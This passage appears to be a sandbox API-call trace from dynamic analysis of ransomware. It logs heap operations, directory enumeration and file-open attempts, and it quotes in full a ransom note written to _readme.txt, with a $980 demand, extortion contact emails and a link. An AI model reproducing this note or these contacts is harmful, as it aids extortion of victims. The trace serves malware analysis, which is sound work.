returned 1 [0178.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.801] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.801] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.805] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.805] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0178.805] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0178.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.805] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.805] PathFindFileNameW (pszPath="") returned="" [0178.805] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.806] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.806] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.806] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.807] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0178.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.807] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0178.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0178.807] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0178.807] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0178.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0178.807] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0178.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0178.808] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.808] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*" (normalized: "c:\\boot\\es-es\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0178.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.809] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.809] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0178.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.809] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.809] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0178.809] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.810] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0178.810] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.811] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.811] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.811] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.822] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.825] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.826] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.826] RtlAllocateHeap (HeapHandle=0x6a0000, 